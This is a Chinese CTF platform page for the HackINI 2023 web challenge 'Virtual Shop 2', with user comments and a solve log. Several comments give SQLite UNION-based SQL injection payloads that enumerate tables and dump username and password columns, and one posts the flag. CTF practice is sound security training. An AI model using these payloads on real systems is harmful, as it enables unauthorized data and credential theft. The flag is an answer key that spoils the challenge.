Virtual Shop 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2023
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 352
提  示:
描  述:
I'm not making the same mistake again this time, you can't guess my\ \ tables now.\n \n\n **Author**: F100w
评论
你不懂的吧 1年前

3、查出具体表的字段: ' union SELECT pw789,null,null,null FROM UsEErrSS1337987 --+

回复 0

你不懂的吧 1年前

1、查出表有哪些表: ' union SELECT name,null,null,null FROM sqlite_master WHERE type='table' ; 2、查出表有哪些列 :' union SELECT sql,null,null,null FROM sqlite_master WHERE type='table' AND name='UsEErrSS1337987';

回复 1

smtall 1年前

sqlmap使用hex编码提取数据(绕过限制)

回复 0

MoCaser 1年前

我......我......我一把梭战神口牙!!

回复 0

lq61618 2年前

shellmates{Gg_b0Y_you_kNOW_w3ll_H0w_T0_uSe_uNiOn_4tTacK}

回复 0

xiaobai568 2年前

我写了个WP,描述了手工注入的过程

回复 0

啊这这 2年前

我的sqlmap没跑出来 用的level3 不过我花了十几分钟学了一下sqlite使用 做出来了 还是不错的

回复 0
xiaoxiao972521 2年前

不晓得,sqlmap一把过

回复 0

justsosoloveyou 2年前

' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(usnme324||':'||pw789) FROM UsEErrSS1337987)--+

回复 0

zhangye 2年前

sqlmap跑时把之前跑的文件删了,不然给的是1的flag

回复 3

hopeinhand 2年前

sqlmap一把梭

回复 0

WriteUp

image
sanshi

1 金币

评分(0)

暂无评分

解题动态

AITester 攻破了该题 2天前
jibabenba 攻破了该题 2天前
caixinggang 攻破了该题 3天前
AWDAI 攻破了该题 4天前
1233333333 攻破了该题 5天前
mdd 攻破了该题 8天前
Rien 攻破了该题 8天前
nihao123@ 攻破了该题 9天前
阿斯蒂芬123 攻破了该题 11天前
WWls= 攻破了该题 12天前
Mu'S'iC 攻破了该题 12天前
飞行雪融 攻破了该题 17天前
hell0-hnc 攻破了该题 24天前
licco 攻破了该题 24天前
vx606v 攻破了该题 25天前
yojiro 攻破了该题 26天前
时间不会说谎 攻破了该题 29天前
zant 攻破了该题 1月前
yclbest 攻破了该题 1月前
abcd7 攻破了该题 1月前
问题反馈